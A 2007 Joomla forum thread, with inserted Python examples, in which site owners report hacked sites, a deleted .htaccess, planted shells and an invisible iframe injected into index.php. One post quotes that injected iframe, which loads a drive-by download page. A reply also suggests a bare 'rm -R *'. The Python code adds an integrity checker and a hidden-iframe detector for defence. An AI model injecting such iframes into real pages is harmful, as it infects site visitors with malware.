Joomla! Discussion Forums



Posted: Sun Jan 21, 2007 11:30 pm
Joomla! Apprentice

Joined: Wed Oct 04, 2006 9:33 am
Posts: 9
I have had two Joomla websites hacked this week :-[. So this posting is a warning to others to take care.

I am running Joomla 1.0.12 on both sites and have followed the security advice on the forum as best as I can. All files have had their permissions set to 644 and folders to 755.

What’s happened is the hacker has added the following code to the end of index.php, which is not good. When I tried to access the home page my anti-virus software popped up and started moving files from the browser to the virus vault.




The index.php file had its permissions set to 644; I have now set it to 444 and just hope that this will stop them.


Posted: Sun Jan 21, 2007 11:41 pm
Joomla! Explorer

Joined: Tue Aug 23, 2005 4:55 am
Posts: 280
Location: On my CBR 1000rr...
Is your site on a shared host?

_________________
Love, Live PHP.
Love, Live Joomla!
Super Sonic Man...do you want to buy a RockeTheme rocket? -Gary Jules


Posted: Sun Jan 21, 2007 11:43 pm
Joomla! Enthusiast

Joined: Fri Sep 01, 2006 4:39 am
Posts: 177
Location: chicago
wow, that sucks. i'd also like to see more details, like which version of php, how you turned off register globals, what kind of host(s) you are using, etc.

edit: oh yeah -- if you wouldn't mind, please list the 3rd-party stuff you're using


Last edited by zimv20 on Sun Jan 21, 2007 11:50 pm, edited 1 time in total.

Posted: Sun Jan 21, 2007 11:54 pm
Joomla! Apprentice

Joined: Wed Oct 04, 2006 9:33 am
Posts: 9
Yes, it’s a shared host.
It's PHP version 4xx; I will check tomorrow and post full info.
All security settings such as global are set correctly.
When I start Joomla admin I do not get any warnings at the bottom of the page.


Posted: Mon Jan 22, 2007 9:53 am
Joomla! Fledgling

Joined: Thu Jan 04, 2007 10:48 am
Posts: 1
I'm sorry to hear that  :(. Do you have a backup of your files?
I'm a newbie here, so I'll ask whether they also changed/erased other data, or just edited the index.php?


Posted: Mon Jan 22, 2007 10:32 am
Joomla! Apprentice

Joined: Wed Oct 04, 2006 9:33 am
Posts: 9
I have now found that the .htaccess file has been deleted. Also, I have set the file permissions to 444 in the root folder. However, as soon as I start the Joomla website the file permissions are set back to 644. Is this correct? Can Joomla do this?

PHP version 4.4.2
MySql version 4.1.21- standard
Apache version 1.3.36 - Unix


Posted: Wed Jan 24, 2007 3:01 am
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 808
Location: Third planet from Sol
Be sure to delete the entire directory and start from clean backups, or from scratch. Once they get in, there are many things they may have done to your site. Not much point in trying to figure out how many changes were made.

For more info, see: http://forum.joomla.org/index.php/topic,81058.0.html

_________________
Web Home: http://www.ronliskey.com
Support http://support.educationgrove.com


Posted: Wed Jan 24, 2007 8:54 am
Joomla! Apprentice

Joined: Wed Oct 04, 2006 9:33 am
Posts: 9
I have fully reinstalled the site over the old site, is this sufficient?  Or should I have the web host delete the site and then start again?


Posted: Thu Jan 25, 2007 2:32 am
Joomla! Apprentice

Joined: Wed Jun 14, 2006 3:42 pm
Posts: 30
I just had my site hacked also >:(.  They hacked into my index file and installed that nice little ----
"
"  ----
My host guy found it and removed the code and everything seems to be fine for now. i changed all passwords.
He says they got in through Joomla. 
So, what does a person do to keep them out!!

_________________
http://www.cowboymart.com - Joomla based
http://www.rodeoproshop.com - Zencart based


Posted: Thu Jan 25, 2007 3:36 am
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 808
Location: Third planet from Sol
Quote:
So, what does a person do to keep them out!!


1) Read this: http://forum.joomla.org/index.php/topic,81058.0.html

2) Delete the entire public_html directory and reinstall from clean backups or from original installs. Once they get in, there are many things they may have done to your site, and you may never find all Trojan Horses, meaning you may get attacked again at any time.

_________________
Web Home: http://www.ronliskey.com
Support http://support.educationgrove.com


Posted: Thu Jan 25, 2007 6:44 am
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 808
Location: Third planet from Sol
Quote:
I have fully reinstalled the site over the old site, is this sufficient?  Or should I have the web host delete the site and then start again?


Depends on how the reinstall was done. A complete reinstall would take care of Joomla file issues, but if a non-Joomla file was added to a standard Joomla directory, then reinstalling Joomla probably would not affect that file. That's why I recommend totally deleting the directory and creating a new one before reinstalling. That guarantees a complete new install with no lingering Trojan Horses.

Of course you can also mess around with "rm -R *" which does essentially the same thing.

_________________
Web Home: http://www.ronliskey.com
Support http://support.educationgrove.com


Posted: Thu Jan 25, 2007 10:42 am
Joomla! Virtuoso

Joined: Fri Aug 12, 2005 7:19 am
Posts: 4471
Location: Leeds, UK
cowboyfred wrote:
I just had my site hacked also >:(.  They hacked into my index file and installed that nice little ----
"
"   ----
My host guy found it and removed the code and everything seems to be fine for now. i changed all passwords.
He says they got in through Joomla. 
So, what does a person do to keep them out!!



This particular hack is not a joomla hack. It has been reported elsewhere (back in September I think) as a hack in cpanel. Cpanel released a patch to fix this.


Posted: Thu Jan 25, 2007 12:42 pm
Joomla! Explorer

Joined: Tue Aug 23, 2005 4:55 am
Posts: 280
Location: On my CBR 1000rr...
I would suggest finding another hosting company who has better controls and knowledge of their setups.

_________________
Love, Live PHP.
Love, Live Joomla!
Super Sonic Man...do you want to buy a RockeTheme rocket? -Gary Jules


Posted: Thu Jan 25, 2007 12:44 pm
Joomla! Virtuoso

Joined: Fri Aug 12, 2005 7:19 am
Posts: 4471
Location: Leeds, UK
Also you should do a virus scan of your local PC as this hack attempts to download a virus to the computer of every visitor to your site


Posted: Thu Jan 25, 2007 3:49 pm
Joomla! Apprentice

Joined: Wed Jun 14, 2006 3:42 pm
Posts: 30
Thanks for all the info ;D As far as i know, looking at my files and research on the web, the attack is just inserting the "I-frame" and not messing up the site. Their attack is on the site's users, gaining access to the users' computers, not the website. Because, if the site is messed up then no one will visit the site.
???UNLESS???!!!  They have also hidden a code to gain access back to the site and infect it again.  This is just an idea. 




Also, i use camelot hosting and i informed him of a possible hack. He immediately fixed the hack and even gave me a phone call to explain and make sure that everything is ok. Now, that is customer service :D

_________________
http://www.cowboymart.com - Joomla based
http://www.rodeoproshop.com - Zencart based


Last edited by cowboyfred on Thu Jan 25, 2007 3:53 pm, edited 1 time in total.

Posted: Thu Jan 25, 2007 4:35 pm
Joomla! Virtuoso

Joined: Fri Aug 12, 2005 7:19 am
Posts: 4471
Location: Leeds, UK
No, customer service would have been to apply the fix when it was released months ago and not leave you vulnerable.


Posted: Thu Jan 25, 2007 5:09 pm
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 808
Location: Third planet from Sol
@ brian

I was wondering how you are able to tell from this code insert that it's a cPanel attack? I would have thought it could also be done by a Trojan Horse or through the J! Template Mgr. Are you saying it has to have been a cPanel attack because of the file permissions (644)?

_________________
Web Home: http://www.ronliskey.com
Support http://support.educationgrove.com


Posted: Thu Jan 25, 2007 5:11 pm
Joomla! Virtuoso

Joined: Fri Aug 12, 2005 7:19 am
Posts: 4471
Location: Leeds, UK
I am saying that it's a cpanel attack as back in September (iirc) this exact same hack occurred and after discussions on the webhostingtalk and cpanel forums cpanel released a patch.

If as a mod you have access to the xxxxx in the first post just google for it and you will get the links, otherwise pm me.


Posted: Thu Jan 25, 2007 6:30 pm
Joomla! Fledgling

Joined: Sat Aug 05, 2006 3:08 am
Posts: 4
My site got hacked today.
I installed 1.0.12 about 2 weeks ago.
I moved the files the hacker installed to a folder and here are the links
[MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED]


Last edited by rliskey on Fri Jan 26, 2007 6:00 pm, edited 1 time in total.

Posted: Thu Jan 25, 2007 9:56 pm
Joomla! Apprentice

Joined: Wed Jun 14, 2006 3:42 pm
Posts: 30
studiomejia wrote:
My site got hacked today.
I installed 1.0.12 about 2 weeks ago.
I moved the files the hacker installed to a folder and here are the links
[MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED]



dang you really got hacked. my hacker just installed that little I-frame download/redirect.

_________________
http://www.cowboymart.com - Joomla based
http://www.rodeoproshop.com - Zencart based


Last edited by rliskey on Fri Jan 26, 2007 6:00 pm, edited 1 time in total.

Posted: Sat Jan 27, 2007 11:39 pm
Joomla! Apprentice

Joined: Tue Dec 19, 2006 3:32 am
Posts: 5
Location: Illinois
my joomla site was hacked last night or today early morning. I won't give that duckass the benefit of the doubt mentioning his/her name, but they shut down my site. How are these hackers able to find, target and disable joomla sites? Is there some spider/bot that searches the web for Joomla tags? I've removed any joomla meta tags, but it seems they have other ways of finding Joomla sites.
Does the following information lend any clues as to what I must do to reestablish my site:

HACKED BY XXXXX; (duckass left a weblink here too)
Warning: main() [function.main]: open_basedir restriction in effect. File(/includes/version.php) is not within the allowed path(s): (/home/xxxx:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/xxxx/public_html/xxxx/includes/joomla.php on line 71

Warning: main(/includes/version.php) [function.main]: failed to open stream: Operation not permitted in /home/xxx/public_html/xxx/includes/joomla.php on line 71

Fatal error: main() [function.require]: Failed opening required '/includes/version.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/xxx/includes/joomla.php on line 71

_________________
Making the Internet a Happier Place


Posted: Sun Jan 28, 2007 12:25 am
Joomla! Explorer

Joined: Tue Aug 23, 2005 4:55 am
Posts: 280
Location: On my CBR 1000rr...
There are other fingerprints a joomla site has other than the meta tags, like index.php?option=com_frontpage, but it is possible they gained access from another account on your host's server.

You might want to have your host check things over and review your log files and be sure you are running the latest versions of Joomla and any trusted 3rd party extensions.

Many of these types of attacks are from a compromised account on another site on a shared host.

_________________
Love, Live PHP.
Love, Live Joomla!
Super Sonic Man...do you want to buy a RockeTheme rocket? -Gary Jules


Posted: Sun Jan 28, 2007 1:01 am
Joomla! Intern

Joined: Sun Jul 23, 2006 2:36 am
Posts: 78
Been hacked here also

I have been picking through folder after folder for about 3.5 hrs now.
Irc hacks and back doors all over the place.
This started right after the 1.0.12 upgrade. And this was on two sites, one that was just installed without any outside modules or components. I just started to work on this site. Our provider states there is a hole in Joomla that let them in.

Now what ??? Our site has been trashed and the backup is probably not going to help.

SZippy 


Update 2227est 27jan07  Still at it since 1730est. Most every folder had something hidden in it.  The biggest hit was the cgi-bin and administrator/components/com_linkdirectory folder. >:(


Last edited by SZippy on Sun Jan 28, 2007 3:30 am, edited 1 time in total.

Posted: Sun Jan 28, 2007 1:13 am
Joomla! Apprentice

Joined: Wed Jun 14, 2006 3:42 pm
Posts: 30
when i was hacked i was running Joomla 1.0.10 with a bunch of extensions, mods... Then after the hack i upgraded to the 1.0.12. My hoster also said it was Joomla, but of course no one is admitting any guilt. I don't care who is at fault ???

Let's just get this problem solved. I wish i knew more to help solve this problem, but i am an amateur dude. It would be nice if there was a way to start a forum, database, or some type of way to compare sites that each person had installed, setups, versions, etc. that were hacked to narrow down where the gate is. Although we wouldn't be able to publicly post these cause then the hackers would love us even more. Just an idea.

_________________
http://www.cowboymart.com - Joomla based
http://www.rodeoproshop.com - Zencart based


Posted: Mon Jan 29, 2007 12:11 am
Joomla! Apprentice

Joined: Wed Oct 04, 2006 9:33 am
Posts: 9
It's three times this week now :( and I am getting fed up. Same as last time, the hack added lines of code to the index.php and this time to the index2.php file as well. Also a lot more lines were added to the file.

I have set the file permissions to 644 and all Joomla settings are correct, so I just don’t know what to do now. I will however delete the site and start afresh next week and see how that does.

A small utility to monitor the two files would be useful and one which could copy the proper files back would be splendid. I know it's not an answer to the security issue but it would stop this hack.


Posted: Mon Jan 29, 2007 12:33 am
Joomla! Explorer

Joined: Sat Aug 20, 2005 1:44 pm
Posts: 307
Location: Melbourne, Australia
jsm25 wrote:
A small utility to monitor the two files would be useful and one which could copy the proper files back would be splendid. I know it's not an answer to the security issue but it would stop this hack.


These are the two files you see. There are possibly dozens of others modified by the cracking scripts. If you have followed the security guidelines on this forum, your site would have been safe. There are millions of other safe sites using joomla.

alamgir

_________________
www.apona-bd.com Bangla OCR and other software.
www.joomla.org.bd Bangla Joomla Site
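
The check discussed in the posts above (a utility that watches index.php and index2.php and copies the proper files back, extended here to the whole tree because other files may have been changed or added), as an added example that is not part of the original thread. It compares the live site against a clean reference copy; the directory layout and file contents built in `demo()` are constructed for illustration.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

def sha256_of(path):
    """Hash a file in chunks so large files are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def manifest(root):
    """Map each file's path (relative to root, dotfiles included) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare(clean_root, live_root):
    """Return files modified, added or missing in live_root versus clean_root."""
    clean, live = manifest(clean_root), manifest(live_root)
    common = clean.keys() & live.keys()
    return {
        "modified": sorted(f for f in common if clean[f] != live[f]),
        "added": sorted(live.keys() - clean.keys()),
        "missing": sorted(clean.keys() - live.keys()),
    }

def restore(clean_root, live_root, names):
    """Copy the named files back from the clean copy, creating directories as needed."""
    for name in names:
        target = Path(live_root) / name
        target.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(Path(clean_root) / name, target)

def demo():
    """Build a constructed clean tree and a tampered copy, compare, restore, compare again."""
    base = Path(tempfile.mkdtemp())
    clean, live = base / "clean", base / "live"
    files = {"index.php": "<?php // home\n", "index2.php": "<?php // raw\n",
             ".htaccess": "Options -Indexes\n",
             "includes/joomla.php": "<?php // core\n"}
    for rel, body in files.items():
        (clean / rel).parent.mkdir(parents=True, exist_ok=True)
        (clean / rel).write_text(body)
    shutil.copytree(clean, live)
    # Constructed tampering that mirrors what the thread reports.
    with open(live / "index.php", "a") as fh:
        fh.write("<!-- appended line -->\n")
    (live / ".htaccess").unlink()
    (live / "cgi-bin").mkdir()
    (live / "cgi-bin" / "use.php").write_text("<?php // unknown file\n")
    before = compare(clean, live)
    restore(clean, live, before["modified"] + before["missing"])
    return before, compare(clean, live)

if __name__ == "__main__":
    print(demo())
```

Restoring puts changed and deleted files back but leaves added files in place, which is the case the replies above have in mind when they recommend deleting the directory before reinstalling. When the reference is a fresh unpack rather than a backup, files that legitimately differ (configuration.php, uploads) will be listed too.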


Posted: Mon Jan 29, 2007 12:42 am
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 808
Location: Third planet from Sol
Quote:
Let's just get this problem solved. I wish i knew more to help solve this problem, but i am an amateur dude. It would be nice if there was a way to start a forum, database, or some type of way to compare sites that each person had installed, setups, versions, etc. that were hacked to narrow down where the gate is. Although we wouldn't be able to publicly post these cause then the hackers would love us even more. Just an idea.


Check if this helps: http://forum.joomla.org/index.php/topic,130926

_________________
Web Home: http://www.ronliskey.com
Support http://support.educationgrove.com


Posted: Mon Jan 29, 2007 8:54 am
Joomla! Apprentice

Joined: Wed Oct 04, 2006 9:33 am
Posts: 9
My Recommendations

If you are using cpanel, change your password; don’t leave the one you were given, and change it frequently.

Check file and folder permissions and don’t forget your root folder public_html; this folder can quite easily be overlooked.


Posted: Sun Feb 11, 2007 1:05 pm
Joomla! Apprentice

Joined: Sun Jun 25, 2006 6:14 pm
Posts: 10
i found last night my site hacked, the index.php and index2.php deleted, and an index.html created

i think the hole is com_babackup

i found the index.html, 7us.php and use.php (is a PHP/C99Shell.A trojan) in /administrator/com_babackup/classes changed..

grffggfgrttllñlkrt !!


Posted: Mon Feb 26, 2007 1:21 pm
Joomla! Fledgling

Joined: Thu Aug 31, 2006 7:41 am
Posts: 1
my 4 joomla sites were hacked by the same method. I use joomla 1.0.12 version. My other joomla versions are not hacked.
the hacker has added the following code to the first line of index.php in the joomla main directory.

Code:
<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0
src="h**p://traff.step57.info/10/"></iframe><!-- ~ -->


I clean the codes.

and I use plesk 8.01. I ran rkhunter on the plesk panel to scan the server but it did not find any virus or trojan... I checked permissions, but the code was added again...

please help


Last edited by yusufsel on Mon Feb 26, 2007 1:24 pm, edited 1 time in total.
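
A detection sketch for the kind of injection quoted in the post above, as an added example that is not part of the original thread: it flags `<iframe>` tags that are sized or styled to be invisible, including unquoted attributes and tags split across lines. The sample markup and the `example.invalid` hosts are constructed; only the shape of the injected tag follows the post.

```python
import re
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)

def parse_attrs(raw):
    """Return a tag's attributes as a dict with lower-cased names; values may be unquoted."""
    return {m.group(1).lower(): next(v for v in m.groups()[1:] if v is not None)
            for m in ATTR_RE.finditer(raw)}

def is_tiny(value, limit=2):
    """True for pixel sizes of `limit` or less, such as 0, 1 or '1px'."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.IGNORECASE)
    return bool(m) and int(m.group(1)) <= limit

def find_hidden_iframes(text):
    """Return (line_number, src, reason) for each iframe made invisible by size or style."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        reasons = []
        if is_tiny(attrs.get("width")) or is_tiny(attrs.get("height")):
            reasons.append("tiny")
        if HIDDEN_STYLE_RE.search(attrs.get("style", "")):
            reasons.append("hidden-style")
        if reasons:
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, attrs.get("src", ""), "+".join(reasons)))
    return findings

def scan_tree(root, suffixes=(".php", ".html", ".htm")):
    """Scan every matching file under root; returns {relative_path: findings}."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = find_hidden_iframes(path.read_text(errors="replace"))
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits

# Constructed sample: one ordinary embed, then two hidden frames.
SAMPLE = '''<?php echo "home"; ?>
<iframe src="https://video.example.invalid/embed" width="560" height="315"></iframe>
<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0
src="h**p://injected.example.invalid/10/"></iframe><!-- ~ -->
<IFRAME SRC='h**p://other.example.invalid/' style="display: none"></IFRAME>
'''

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE):
        print(finding)
```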
